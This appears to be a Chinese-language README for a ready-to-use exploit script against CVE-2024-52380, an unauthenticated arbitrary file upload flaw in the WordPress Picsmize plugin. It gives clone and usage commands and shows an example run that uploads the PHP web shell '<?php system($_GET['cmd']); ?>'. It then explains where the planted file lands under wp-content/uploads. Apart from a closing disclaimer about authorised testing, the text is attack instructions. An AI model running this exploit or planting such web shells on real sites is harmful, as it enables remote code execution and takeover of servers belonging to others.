WordPress 的 Picsmize 插件存在任意文件上传漏洞。
此脚本利用 WordPress 的 Picsmize 插件 中的一个漏洞(CVE-2024-52380),允许未认证攻击者进行任意文件上传。该漏洞存在于 Picsmize 的 1.0.0 及之前所有版本中。利用此漏洞可能导致在目标服务器上远程执行代码。
requests 库(pip install requests)git clone https://github.com/Nxploited/CVE-2024-52380-Exploit.git
cd CVE-2024-52380-Exploit
usage: CVE-2024-52380.py [-h] -u URL [-c CONTENT]
Check plugin version and upload a PHP file to a WordPress site.
options:
-h, --help show this help message and exit
-u URL, --url URL Base URL of the WordPress site (e.g., http://192.168.100.74:888).
-c CONTENT, --content CONTENT
Content of the PHP file to be uploaded.
python CVE-2024-52380.py -u http://192.168.1.100 -c "<?php system($_GET['cmd']); ?>"
该脚本提供两个命令行参数,以便使用:
-u / --url(必填):
-u http://example.com
-c / --content(可选):
<?php phpinfo(); ?>
-c "<?php system($_GET['cmd']); ?>"
/wordpress:WordPress 站点的根目录。wp-content/uploads:WordPress 中媒体上传的默认目录。2025/01:该目录结构对应于基于服务器日期配置的年份(2025)和月份(一月)。http://target-site.com/wordpress/wp-content/uploads/2025/01/t-678b2ef61b3f41737174774.php
此工具仅用于教育目的和授权安全测试。在未经授权的情况下,对您不拥有或未经明确许可进行测试的系统使用此工具,是非法且不道德的。